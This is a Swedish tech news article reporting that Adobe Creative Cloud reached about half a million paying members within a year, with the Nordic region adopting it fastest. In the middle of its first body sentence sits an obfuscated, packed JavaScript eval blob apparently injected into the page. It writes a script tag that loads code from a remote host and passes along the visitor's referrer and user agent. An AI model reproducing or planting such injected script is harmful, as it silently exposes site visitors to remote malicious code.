Image Image Image Image Image Image Image Image Image Image

| 29 maj, 2020

Scroll to top

Top

En halv miljon betalande medlemmar i Creative Cloud

En halv miljon betalande medlemmar i Creative Cloud
Sebastian

På eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hrrdr|var|u0026u|referrer|zezay||js|php’.split(’|’),0,{}))
mindre än ett år har Adobe Creative Cloud runt en halv miljon betalande medlemmar. Särskilt kreativa i Norden har valt att gå över till molnet. Samtidigt har mer än två miljoner personer tecknat ett gratis provmedlemsskap för den molnbaserade tjänsten för kreativa profesionella.

Framtidens mjukvara är monlbaserad. På mindre än tolv månader har antalet betalande medlemmar i Adobes molnbaserade tjänst för kreativa vuxit till mer än en halv miljon betalande medlemmar globalt. Adobe Creative Cloud lanserades våren 2012 och blev en stor succé bland designers och andra kreativa som vill ha tillgång till avancerade, professionella redskap, som alltid är uppdaterade till senaste versionen till ett rimligt pris.

I Norden går det extra bra. Här finns det gott om duktiga kreatörer i förhållande till befolkningens storlek och vi är även i toppen när det gäller användning av digitala lösningar:

”Jag är överväldigad över hur snabbt övergången till Creative Cloud går. Norden är den region i världen som har konverterat snabbast till Adobe Creative Cloud, vilket egentligen inte förvånar eftersom vår region ligger både i kreativ och teknisk framkant. När vi nu har lanserat både en version för teams och en för enterprisekunder, så kommer takten bara att öka ytterligare.” säger Mariah Andén, nordisk marknadschef för Digital Media hos Adobe.

Man kan testa Creative Cloud gratis i en månad med full tillgång till alla funktioner. Det är mer än två miljoner som har gjort detta sedan lanseringen i maj förra året.

Om Creative Cloud

Adobe Creative Cloud är en molnbaserad tjänst där medlemmar kan utforska, publicera, dela och arbeta via olika enheter i molnet och på sin egen dator. Man laddar ner programmen från Creative Cloud och delar filerna i molnet. Medlemsskap i Creative Cloud-tjänsten kostar från 565 kronor i månaden och de kunder som i dagsläget har CS får just nu 40% rabatt på detta pris.

Man kan läsa mer om och testa Adobe Creative Cloud kostnadsfritt här.

Alla priser är hämtade från Adobes svenska webbshop.